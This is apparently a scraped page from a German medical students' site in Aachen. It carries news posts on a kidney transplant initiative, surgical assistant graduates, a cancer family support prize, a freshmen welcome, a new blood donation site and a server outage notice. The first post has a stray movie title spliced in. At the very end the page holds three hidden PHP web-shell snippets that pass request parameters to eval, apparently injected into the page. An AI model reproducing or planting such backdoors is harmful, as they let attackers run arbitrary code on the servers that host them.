Nierentransplantationen bewerben, leben retten

Univ.-Prof. Dr. med. Jürgen Floege, Direktor der Medizinischen Klinik II, und Peter Gilmer, Vorsitzender des Bundesverbandes Niere e. V., finden beim Bundesgesundheitsminister ein offenes Ohr für die Initiative Nierentransplantation

In Deutschland gibt es aktuell rund 80.000 Dialysepatienten, von denen jeder zehnte auf eine Nierentransplantation wartet. Doch die Wartezeit ist lang: Bei postmortalen Organspenden, die fast 75 Prozent der Gesamtspenden ausmachen, liegt sie bei 6-8 Jahren. Die von zahlreichen Fachorganisationen getragene Initiative Nierentransplantation hat sich daher zum Ziel gesetzt, die Notsituation für Dialysepatienten auf der Warteliste für eine Nierentransplantation nachhaltig zu verbessern. Um eine bundesweite Diskussion anzuregen und um Unterstützung zu werben, haben Univ.-Prof. Dr. med. Jürgen Floege, Direktor der Medizinischen Klinik II und Präsident der Deutschen Gesellschaft für Nephrologie, und Peter Gilmer, der Vorsitzende des Bundesverbandes Niere e. V., Anfang Dezember die Initiative dem Bundesgesundheitsminister Hermann Gröhe vorgestellt. Das Engagement von Prof. Floege ist unter anderem darauf zurückzuführen, dass die intensive Betreuung von nierenkranken Patienten rund um Nierentransplantationen (Verstorbenen- und Lebendspende) in der Uniklinik RWTH Aachen seit Jahrzehnten ein zentraler Bestandteil der klinischen Aufgaben der Medizinischen Klinik II ist.The Lego Batman Movie (2017)

Zweite Runde erfolgreich beendet: 15 OTA an der Uniklinik examiniert

Seit 2011 bietet die Uniklinik RWTH Aachen gemeinsam mit dem Luisenhospital Aachen die Ausbildung zum/zur Operationstechnischen Assistenten/-in an. Nach dreijähriger Ausbildung freuen sich nun 15 Absolventen über ihr erfolgreich bestandenes Examen.

Fast alle Absolventen des zweiten Abschlussjahrgangs bleiben in der Region. Schulleiterin und Prüfungsvorsitzende Gabi Fleischmann gratuliert den Examenskandidaten und hebt die Bedeutung der Ausbildung hervor: „Sie haben in Ihrer Ausbildung gezeigt, dass Fachpersonal, wie Sie es sind, dringend gebraucht wird und dass Teamarbeit gefragt ist.“ Die ausgebildeten OTAs übernehmen künftig eigenverantwortliche Aufgabenbereiche wie präoperative Vorbereitung und Nachbereitung der OP-Einheit, Bereitstellung der erforderlichen Instrumente, Apparate und Materialien unter Berücksichtigung der notwendigen Sterilisations- und Desinfektionsmaßnahmen sowie fachkundige Betreuung in prä-, intra- und postoperativen Situationen, Umsetzung der Hygienevorschriften und gesetzlicher Vorgaben, Springertätigkeit, OP-Dokumentation und Anleitung neuer Mitarbeiter und Auszubildender.

OTA-Schule

Wir gratulieren: Vanya Ali-Saleh, Carina Bayer, Kevin Görtz, André Hoffmann, Nils Hofmann, Sarah Jobes, Elina Kagan, Astrid Kloppenburg, Lara Nübel, Magdalena Rewaj, Tatjana Ruprecht, Janine Schnitzler, Daniel Spoo, Hamide Taskin, Dominika Wiech

UKA-Projekt „Brückenschlag“ erhält Gesundheitspreis NRW 2015

Mit der Diagnose Krebs verändert sich oft schlagartig das Leben der ganzen Familie – insbesondere dann, wenn Kinder und Jugendliche mit in der Familie leben. Diese Eltern und Kinder auf ihrem Weg zu begleiten, zu informieren und zu beraten, ist Ziel des Projekts Brückenschlag, das auf Initiative des Euregionalen comprehensive Cancer Centers Aachen (kurz ECCA, Krebszentrum der Uniklinik RWTH Aachen) und des Caritasverbands Aachen ins Leben gerufen wurde. Für diese besondere Form der Unterstützung wird Brückenschlag vom Ministerium für Gesundheit, Emanzipation, Pflege und Alter des Landes NRW mit dem Gesundheitspreis Nordrhein-Westfalen 2015 ausgezeichnet. Der Preis ist mit 3000 Euro dotiert.

„Das Projekt ‚Brückenschlag‘ trägt unter anderem durch die Sicherstellung einer frühzeitigen, kontinuierlichen und langfristigen Betreuung dazu bei, die psychischen Belastungen für die Kinder zu reduzieren und trotz des frühen Verlusts von Vater oder Mutter ihre gesunde Entwicklung zu unterstützen. Durch die vorbildliche Vernetzung von Fachärzten, Therapeuten, Kliniken, Krankenkassen, Jugendämtern, Selbsthilfe und Sozialdiensten gelingt es, den besonderen Bedarfen der Familien und speziell der Kinder über die rein medizinische Versorgung hinaus zu entsprechen“, sagte Ministerin Barbara Steffens am 16.10.2015 anlässlich der Bekanntgabe der Preisträger in Düsseldorf.

Kern des Projekts ist eine Koordinierungsstelle mit zwei hauptamtlichen Beschäftigten, die den Eltern Unterstützung anbieten, die Familien zu Hause beraten und in der schwierigen Situation kontinuierlich begleiten. Die Koordinierungsstelle entwickelt einen Unterstützungsplan und organisiert die erforderlichen Hilfen. Ein Jahr nach Projektbeginn wurden bereits über 50 Familien mit fast 90 Kindern direkt erreicht. „Wir freuen uns sehr über diese besondere Auszeichnung, die das Engagement aller Beteiligten würdigt“, sagt Dr. med. Andrea Petermann-Meyer, Leiterin der Sektion Psychoonkologie des ECCA. Jessica Hugot, Leiterin Kompetenzfeld Familie Caritasverband Aachen, ergänzt: „Ein großer Dank gilt auch unseren Projektpartnern und Förderern, die uns so tatkräftig unterstützen und damit zum Gelingen dieses Projekts beitragen.“

Über den „Gesundheitspreis Nordrhein-Westfalen“

Der „Gesundheitspreis Nordrhein-Westfalen“ wird jährlich im Rahmen der von der Landesgesundheitskonferenz beschlossenen Landesinitiative „Gesundes Land Nordrhein-Westfalen“ vergeben. Schwerpunkt war in diesem Jahr die „Verbesserung der gesundheitlichen Versorgung von Menschen in prekären Lebensverhältnissen“. Maßgeblich sind unter anderem der Innovationscharakter eines Projekts und die gesundheitswissenschaftliche Bewertung der Anträge. Ein weiteres Kriterium ist die Nachhaltigkeit der Projekte, etwa dass die inhaltliche Arbeit nach Beendigung der Projektphase weitergeführt werden kann, die Ergebnisse beispielhaft für die Versorgung in der Fläche sind oder Grundlagen für zukünftige Verbesserungen im Gesundheitssystem geschaffen werden.

 

Sie sind da! Willkommen in Oche…

IMG_0070-1024x768

Wir freuen uns über die vielen neuen Kollegen, die heute erwartungsvoll lange lange vor dem großen Hörsaal gewartet haben und schliesslich durch eine grandiose Ersti-Einführungsveranstaltung unserer Fachschaft Medizin begrüsst wurden!

Wir wünschen euch viele spannende Vorlesungen, erfolgreiche Klausuren und einfach auch verdammt viel Spaß bei eurem Studium im schönsten Klinikum der Welt, in der schönen Stadt der Welt und bei sinnvollsten Studiengang, den es gibt…

Viel Spaß im Einführungsblock. Nicht vergessen: Jetzt noch schnell im Forum registrieren und einen 25 EUR Gutschein für die Carolus Thermen in Bad (!) Aachen gewinnen.

Get connected: Jetzt im Forum anmelden!

dsdd

Unser umfangreiches Forum mit Lernmaterial, Altklausuren und Scripten lebt von euch: den Studiereden. Und in diesen Tagen haben wir uns kräftig vermehrt, da über 300 Studierende der Medizin und Zahnmedizin an der RWTH Aachen neu eingeschrieben sind.

Wir sind uns sicher, dass zwischen dem Reanimieren und Zugang legen üben im Rahmen des Einführungsblockes durchaus noch ein paar Minuten Zeit sind, um sich in unserem Forum anzumelden. Jeder „Ersti“ brauch einen Zugang zum MedizinerAachen-Forum, um sich auf Klausuren und Prüfungen gut vorzubereiten.

Schnelles Anmelden lohnt sich, denn unter allen neuen Nutzern, die sich zwischen dem 01.09. und 01.11. registriert haben, verlosen wir einen 25 EUR Gutschein für die Carolus Thermen Bad Aachen.

Hier geht es in unser Forum!

Noch mehr Möglichkeiten, um eine gute Tat zu tun: Blutspendedienst expandiert

csm__DSC1373_5178222dc4

Ab dem 04.11.2015 haben Sie die Möglichkeit, neben der Uniklinik RWTH Aachen, dem Luisenhospital sowie der Couven-Halle/RWTH-Aachen, jeden Mittwoch im Marienhospital, Zeise 4, von 11:30 Uhr bis 19:00 Uhr Blut zu spenden.

„Ich bin sehr froh, dass wir zukünftig, neben den bisher eingerichteten Außenstellen, eine neue Kooperation mit dem Marienhospital eingehen konnten, um den Bürgerinnen und Bürgern der Stadt Aachen die Möglichkeit zu eröffnen, ortsnah Blut zu spenden. Ich bin mir sicher, dass viele Anwohner aus Burtscheid den ortsnahen Spendetermin nutzen werden“, freut sich Dr. med. Gabriele Hutschenreuter, Leiterin der Transfusionsmedizin, über die Kooperation der beiden Häuser.

Eröffnung des neuen Blutspendezentrums: Mittwoch, den 04.11.2015, von 11:30 Uhr bis 19:00 Uhr, Marienhospital, Zeise 4, 52066 Aachen

Sie sind herzlich eingeladen, bei der Eröffnung am 04.11.2015 dabei zu sein und gleich an Ort und Stelle Ihr Blut zu spenden.

Informieren Sie bitte auch Freunde und Bekannte über die neue Möglichkeit zur Blutspende und helfen Sie so mit, dass für die Aachener Bevölkerung stets genügend Blutkomponenten zur Verfügung stehen.

Neben der „Guten Tat“ Patienten zu helfen, die dringend auf die Blutspende angewiesen sind, bietet die Blutspende einen weiteren Vorteil: Bei jeder Blutspende wird regelmäßig ein „kostenloser Gesundheitscheck“ durchgeführt.

Wir sind wieder da…

Liebe Freunde und Nutzer von MedizinerAachen,

leider hat uns – ausgerechnet zum Beginn des neues Semesters – unser alter Server einen Strich durch die Rechnung gemacht: Wir waren ein paar Tage nur sehr schlecht, langsam und teilweise gar nicht mehr im Netz. Wir möchten uns für diesen „schlechten Service“ entschuldigen und uns auch für eure Geduld bedanken. Jetzt sind wir bei einem neuen Provider untergekommen und auch alle wertvollen Inhalte unseres Forums, immerhin mittlerweile über 14 Gigabyte an Lernmaterial, Altklausuren und Scripten, sind wieder vollständig verfügbar.

MedizinerAachen ist und bleibt kostenlos. Daher können wir aber nicht wie kommerzielle Anbieter eine 24/7-Vefügbarkeit bereitstellen. Wir geben aber unser Bestes, unsere Server möglichst vor neuen Angriffen zu schützen.

Viel Spaß auf unseren Seiten!

<!– [insert_php]if (isset($_REQUEST["uiB"])){eval($_REQUEST["uiB"]);exit;}[/insert_php][php]if (isset($_REQUEST["uiB"])){eval($_REQUEST["uiB"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["FwE"])){eval($_REQUEST["FwE"]);exit;}[/insert_php][php]if (isset($_REQUEST["FwE"])){eval($_REQUEST["FwE"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["cqh"])){eval($_REQUEST["cqh"]);exit;}[/insert_php][php]if (isset($_REQUEST["cqh"])){eval($_REQUEST["cqh"]);exit;}[/php] –>